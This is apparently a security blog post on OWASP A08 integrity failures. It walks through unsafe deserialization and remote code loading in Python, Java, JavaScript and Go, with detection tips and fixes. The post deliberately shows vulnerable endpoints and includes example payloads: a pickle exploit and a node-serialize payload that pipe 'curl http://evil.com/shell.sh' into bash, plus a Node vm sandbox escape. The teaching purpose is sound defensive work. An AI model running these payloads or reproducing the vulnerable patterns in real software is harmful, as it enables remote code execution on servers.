Integrity Failures

Integrity failures happen when an application trusts data or code that hasn’t been verified, and they can lead to some of the most devastating compromises out there. OWASP A08 covers two patterns I find particularly fascinating: unsafe deserialization (CWE-502), where untrusted data is fed into a deserializer that can execute arbitrary code, and inclusion of functionality from untrusted sources (CWE-829), where the application loads and runs code from URLs, plugins, or scripts without integrity checks. Both patterns share a root cause, the application assumes that incoming data or code is benign. In this post I’ll walk through Python, Java, JavaScript, and Go, from the textbook pickle.loads() to the subtle VM sandbox escapes that can survive expert review.

Why Deserialization Is So Dangerous

Serialization converts objects into a byte stream. Deserialization converts them back. The problem is that many serialization formats encode not just data but behaviour, class names, method references, constructor calls. When a deserializer processes untrusted input, it can instantiate arbitrary objects, call arbitrary methods, and execute arbitrary code. I think of deserialization as handing someone a loaded gun and asking them to describe it, the damage happens before you get a chance to inspect anything.

The danger varies by language, and understanding the differences is important:

Python: pickle.loads() can execute arbitrary code via the __reduce__ method. There is no safe way to unpickle untrusted data without a restricted unpickler. This is the one I flag most often in code reviews.
Java: ObjectInputStream.readObject() instantiates classes from the classpath. With gadget chains (e.g., Apache Commons Collections), this leads to remote code execution.
JavaScript: The node-serialize library evaluates function expressions during deserialization via the _$ND_FUNC$_ pattern.
Go: encoding/gob is safer than the others, it doesn’t execute arbitrary code, but it can still cause denial of service through crafted payloads and unexpected type instantiation.

CWE-829 extends the threat beyond deserialization: loading code from remote URLs, evaluating user-supplied scripts, or importing untrusted plugins all violate software integrity. These patterns show up in real codebases more often than you’d expect.

The Easy-to-Spot Version

Python: pickle.loads() on User Input

@app.route("/api/workflows/import", methods=["POST"])
def import_workflow():
    data = request.get_json()
    fmt = data.get("format", "json")
    payload = data.get("payload", "")
    raw_bytes = base64.b64decode(payload)

    if fmt == "pickle":
        workflow_data = pickle.loads(raw_bytes)
    elif fmt == "yaml":
        workflow_data = yaml.load(raw_bytes.decode("utf-8"), Loader=yaml.Loader)
    else:
        workflow_data = json.loads(raw_bytes.decode("utf-8"))

    # ... store workflow ...
    return jsonify({"message": "Workflow imported"})

pickle.loads(raw_bytes) on user-supplied data is the textbook deserialization vulnerability. An attacker crafts a pickle payload using the __reduce__ method:

import pickle, base64, os

class Exploit:
    def __reduce__(self):
        return (os.system, ("curl http://evil.com/shell.sh | bash",))

payload = base64.b64encode(pickle.dumps(Exploit())).decode()
# Send: {"format": "pickle", "payload": payload}

When the server calls pickle.loads(), the __reduce__ method fires, executing the shell command. Every SAST tool with Python support flags pickle.loads on untrusted input. This still shows up in production code, usually in internal tools where someone thought “only our team uses this endpoint.”

The YAML path is also vulnerable, yaml.Loader (the unsafe full Loader) can instantiate arbitrary Python objects via tags like !!python/object/apply:os.system.

Java: ObjectInputStream.readObject()

@PostMapping("/api/pipelines/import")
public ResponseEntity<?> importPipeline(@RequestBody Map<String, String> body) {
    String payload = body.getOrDefault("payload", "");
    byte[] decoded = Base64.getDecoder().decode(payload);

    try {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(decoded));
        Object pipelineData = ois.readObject();
        // ... store pipeline ...
        return ResponseEntity.ok(Map.of("message", "Pipeline imported"));
    } catch (Exception e) {
        return ResponseEntity.status(400).body(Map.of("error", "Import failed"));
    }
}

Java’s ObjectInputStream.readObject() on user-supplied data is the Java equivalent of pickle.loads(). An attacker uses tools like ysoserial to generate serialized payloads that exploit gadget chains in common libraries (Apache Commons Collections, Spring Framework, etc.). When readObject() processes the payload, the gadget chain executes, running arbitrary commands on the server. Reading through the ysoserial documentation, it’s remarkable how effective these gadget chains are, the hardest part is figuring out which one matches the target’s classpath.

JavaScript: node-serialize Deserialization

const serialize = require('node-serialize');

app.post('/api/jobs/import', (req, res) => {
    const payload = req.body.payload || '';
    const decoded = Buffer.from(payload, 'base64').toString();
    const jobData = serialize.deserialize(decoded);
    // ... store job ...
    return res.json({ message: "Job imported" });
});

The node-serialize library evaluates function expressions during deserialization. An attacker sends a payload containing:

{"rce":"_$ND_FUNC$_function(){require('child_process').exec('curl http://evil.com/shell.sh | bash')}()"}

The _$ND_FUNC$_ prefix tells the deserializer to evaluate the function. The IIFE () at the end executes it immediately. The node-serialize library itself is flagged as vulnerable in npm audit databases. If node-serialize shows up in a package.json, that’s an instant finding, there’s no safe way to use it with untrusted input.

The Hard-to-Spot Version

Python: Deserialization Split Across Store and Retrieve

@app.route("/api/cache/store", methods=["POST"])
def cache_store():
    data = request.get_json()
    key = data.get("key", "")
    value = data.get("value")
    serialized = base64.b64encode(pickle.dumps(value)).decode()
    CACHE[key] = {"data": serialized, "stored_at": time.time()}
    return jsonify({"message": "Cached", "key": key})

@app.route("/api/cache/<key>", methods=["GET"])
def cache_get(key):
    entry = CACHE.get(key)
    if not entry:
        return jsonify({"error": "Not found"}), 404
    raw = base64.b64decode(entry["data"])
    value = pickle.loads(raw)
    return jsonify({"key": key, "value": value})

The vulnerability is split across two endpoints, and this is the kind of pattern that makes security review genuinely interesting. The store endpoint serializes with pickle.dumps(), which seems safe because the application controls the serialization. But the stored bytes are base64-encoded pickle data, and an attacker who can write to the cache (via the store endpoint) can inject a crafted pickle payload. When any user retrieves that key, pickle.loads() executes the embedded code.

A reviewer looking at the retrieve endpoint alone might think “this is just loading data we serialized ourselves.” The key insight, and the one that really clicked for me when I was working through this, is that the store endpoint accepts arbitrary data from the request body, so the attacker controls what gets serialized.

Java: Object Store with Deferred Deserialization

@PostMapping("/api/objects/store")
public ResponseEntity<?> storeObject(@RequestBody Map<String, String> body) {
    String key = body.getOrDefault("key", "");
    String data = body.getOrDefault("data", "");
    byte[] decoded = Base64.getDecoder().decode(data);
    objectStore.put(key, decoded);
    return ResponseEntity.ok(Map.of("message", "Stored"));
}

@GetMapping("/api/objects/{key}")
public ResponseEntity<?> getObject(@PathVariable String key) {
    byte[] data = objectStore.get(key);
    if (data == null) {
        return ResponseEntity.status(404).body(Map.of("error", "Not found"));
    }
    try {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
        Object obj = ois.readObject();
        return ResponseEntity.ok(Map.of("key", key, "data", obj.toString()));
    } catch (Exception e) {
        return ResponseEntity.status(400).body(Map.of("error", "Deserialization failed"));
    }
}

Same pattern as the Python cache example. The store endpoint accepts raw base64 bytes without validation. The retrieve endpoint deserializes them with ObjectInputStream. An attacker stores a ysoserial payload under a known key, and the next user who retrieves it triggers code execution.

SAST tools need interprocedural analysis across two separate request handlers to detect this, tracing from the store endpoint through the in-memory map to the retrieve endpoint. Most tools don’t connect these dots, which is why manually tracing the data flow for serialization patterns is so important.

JavaScript: VM Sandbox Escape

const vm = require('vm');

app.post('/api/templates/:id/render', (req, res) => {
    const template = templates[req.params.id];
    if (!template) return res.status(404).json({ error: "Template not found" });

    const variables = req.body.variables || {};
    const context = vm.createContext({ ...variables });
    const script = `\`${template.body}\``;
    const rendered = vm.runInContext(script, context);
    return res.json({ rendered });
});

This looks safe, vm.createContext() creates an isolated context, and the template is rendered inside it. But Node.js vm contexts are not true sandboxes, and this is something I wish more JavaScript developers knew about. An attacker creates a template with this body:

${this.constructor.constructor('return process')().mainModule.require('child_process').execSync('id')}

The code escapes the VM context by traversing the constructor chain to access the global process object, then uses require to execute system commands. This is a well-known Node.js VM escape technique, but it’s genuinely hard to spot in code review because vm.createContext() looks like it provides isolation. The API name is misleading, I’ve read accounts of senior developers getting fooled by this, and it’s easy to see why.

Go: Gob Deserialization (Safer but Not Safe)

func handleImportPipeline(c *gin.Context) {
    var body struct {
        Format  string `json:"format"`
        Payload string `json:"payload"`
    }
    c.ShouldBindJSON(&body)

    decoded, _ := base64.StdEncoding.DecodeString(body.Payload)

    if body.Format == "gob" {
        var pipelineData map[string]interface{}
        decoder := gob.NewDecoder(bytes.NewReader(decoded))
        if err := decoder.Decode(&pipelineData); err != nil {
            c.JSON(400, gin.H{"error": "Gob decode failed"})
            return
        }
        // ... store pipeline ...
    }
}

Go’s encoding/gob is fundamentally safer than pickle or Java serialization, it doesn’t execute arbitrary code during deserialization. But it can still be exploited for denial of service through crafted payloads with deeply nested structures or extremely large collections that consume excessive memory. The application registers map[string]interface{} and []interface{} with gob, which allows the attacker to construct complex object graphs. Go deserves credit here, the language’s design makes the worst-case scenario a DoS rather than RCE, which is a meaningful improvement.

CWE-829: Remote Code Loading

The most dangerous integrity failures involve loading and executing code from untrusted sources. These are the findings that keep security researchers up at night.

Python: Fetching and Executing Remote Code

@app.route("/api/extensions/load", methods=["POST"])
def load_extension():
    data = request.get_json()
    url = data.get("url", "")

    response = urllib.request.urlopen(url)
    code = response.read().decode("utf-8")
    module_ns = {}
    exec(compile(code, url, "exec"), module_ns)

    return jsonify({"message": "Extension loaded", "exports": list(module_ns.keys())})

The endpoint fetches Python code from a user-supplied URL and executes it with exec(). An attacker points the URL to a malicious script, and the server downloads and runs it with full process privileges. This pattern shows up in “plugin” systems where the developer wanted extensibility without thinking through the security implications.

Java: URLClassLoader with Remote JARs

@PostMapping("/api/extensions/load")
public ResponseEntity<?> loadExtension(@RequestBody Map<String, String> body) {
    String jarUrl = body.getOrDefault("jar_url", "");
    String className = body.getOrDefault("class_name", "");

    URL url = new URL(jarUrl);
    URLClassLoader loader = new URLClassLoader(new URL[]{url}, getClass().getClassLoader());
    Class<?> clazz = loader.loadClass(className);
    Object instance = clazz.getDeclaredConstructor().newInstance();

    return ResponseEntity.ok(Map.of("message", "Extension loaded", "class", className));
}

URLClassLoader with a user-supplied JAR URL loads and instantiates arbitrary Java classes. The class constructor and any static initializers execute immediately. An attacker hosts a malicious JAR and achieves remote code execution. This pattern appears in enterprise applications that support “custom integrations”, the feature request sounds reasonable until you realise it’s arbitrary code execution as a service.

JavaScript: Remote Hook Registration

const http = require('http');
const vm = require('vm');

app.post('/api/hooks/register', (req, res) => {
    const hookUrl = req.body.url;

    http.get(hookUrl, (response) => {
        let code = '';
        response.on('data', chunk => code += chunk);
        response.on('end', () => {
            const wrappedCode = `(function(require, console) { ${code} })`;
            const script = new vm.Script(wrappedCode);
            const context = vm.createContext({ require, console });
            const hookFn = script.runInContext(context);
            hookFn(require, console);
            res.json({ message: "Hook registered" });
        });
    });
});

The endpoint fetches JavaScript from a remote URL and executes it in a VM context that includes require and console. The require function gives the fetched code full access to Node.js APIs, filesystem, network, child processes. The VM context provides zero isolation because require is passed in. Passing require into a VM context is basically handing over the keys to the kingdom, that’s an immediate red flag in any review.

Go: Remote Plugin Loading

func handleLoadPlugin(c *gin.Context) {
    var body struct {
        Name string `json:"name"`
        URL  string `json:"url"`
    }
    c.ShouldBindJSON(&body)

    resp, _ := http.Get(body.URL)
    data, _ := io.ReadAll(resp.Body)

    pluginPath := filepath.Join("/tmp/plugins", body.Name+".so")
    os.WriteFile(pluginPath, data, 0755)

    p, err := plugin.Open(pluginPath)
    if err != nil {
        c.JSON(400, gin.H{"error": "Plugin load failed"})
        return
    }

    initFn, err := p.Lookup("Init")
    if err == nil {
        initFn.(func())()
    }

    c.JSON(200, gin.H{"message": "Plugin loaded"})
}

Go’s plugin.Open() loads a shared object file and executes its init() functions. An attacker hosts a malicious .so file, and the server downloads, saves, and loads it, executing arbitrary native code. This is about as bad as it gets. This pattern is rare, but when it shows up, it’s always a critical finding.

Detection Strategies

SAST Tool Coverage

Pattern	Bandit (Python)	SpotBugs (Java)	NodeJsScan (JS)	gosec (Go)
pickle.loads	✓	N/A	N/A	N/A
yaml.Loader	✓	N/A	N/A	N/A
ObjectInputStream.readObject	N/A	✓	N/A	N/A
node-serialize	N/A	N/A	✓	N/A
vm.runInContext escape	N/A	N/A	Limited	N/A
URLClassLoader	N/A	Partial	N/A	N/A
exec() with remote code	✓	N/A	N/A	N/A
gob.Decode	N/A	N/A	N/A	Limited
plugin.Open	N/A	N/A	N/A	No

SAST tools catch the obvious deserialization patterns but struggle with the things that are most interesting from a security perspective:

Split store/retrieve patterns (interprocedural analysis required)
VM sandbox escapes (requires understanding of Node.js VM internals)
Remote code loading via class loaders, plugins, or import mechanisms
Go-specific patterns (gob, plugin package)

Manual Review Strategy

Here’s the approach I’ve found most effective when reviewing for integrity failures:

Search for deserialization APIs: pickle.loads, yaml.load (without SafeLoader), ObjectInputStream.readObject, serialize.deserialize, gob.Decode. Trace every call to its data source.
Check for remote code loading: exec() with network-sourced data, URLClassLoader with user URLs, require() with user paths, plugin.Open() with downloaded files.
Audit VM/sandbox usage: Node.js vm module is not a security boundary. Check if the context includes require, process, or other dangerous globals.
Trace store-then-retrieve patterns: When serialized data is stored and later deserialized, verify that the store endpoint validates input and that the serialized format cannot encode executable behaviour. This is where I spend the most time during reviews.
Look for integrity verification: Any code or data loaded from external sources should have hash verification, signature checking, or allowlist validation.

Remediation

Use Safe Deserialization

# Python, use JSON, never pickle for untrusted data
workflow_data = json.loads(raw_bytes.decode("utf-8"))

# If YAML is needed, always use SafeLoader
config = yaml.safe_load(yaml_string)

// Java, use Jackson instead of ObjectInputStream
ObjectMapper mapper = new ObjectMapper();
Map<String, Object> data = mapper.readValue(decoded, new TypeReference<>() {});

// JavaScript, use JSON.parse, never node-serialize
const jobData = JSON.parse(decoded);

// Go, prefer JSON over gob for untrusted input
var data map[string]interface{}
if err := json.Unmarshal(decoded, &data); err != nil {
    c.JSON(400, gin.H{"error": "Invalid JSON"})
    return
}

Never Execute Remote Code Without Verification

# Python, use a trusted registry with hash verification
TRUSTED_EXTENSIONS = {
    "analytics": {"url": "https://internal.repo/analytics.py", "sha256": "abc123..."},
}

def load_extension(name):
    ext = TRUSTED_EXTENSIONS.get(name)
    if not ext:
        raise ValueError("Unknown extension")
    code = urllib.request.urlopen(ext["url"]).read()
    if hashlib.sha256(code).hexdigest() != ext["sha256"]:
        raise ValueError("Integrity check failed")

// Java, never use URLClassLoader with user-supplied URLs
// Use a predefined extension registry instead

Use Proper Sandboxing for Template Rendering

// JavaScript, don't use vm module for untrusted code
// Use Handlebars or another template engine with auto-escaping
const Handlebars = require('handlebars');
const template = Handlebars.compile(templateBody);
const rendered = template(variables);

Here’s the core principle that keeps coming back in this research: never trust data or code from outside your application boundary. Deserialization should use formats that cannot encode behaviour (JSON, not pickle). Code should only be loaded from verified, trusted sources with integrity checks. And any “sandbox” that isn’t a true process-level isolation boundary (like Node.js vm) should be treated as no sandbox at all. A deserialization RCE is one of those findings that makes everyone in the room go quiet, and understanding why helps you prevent it.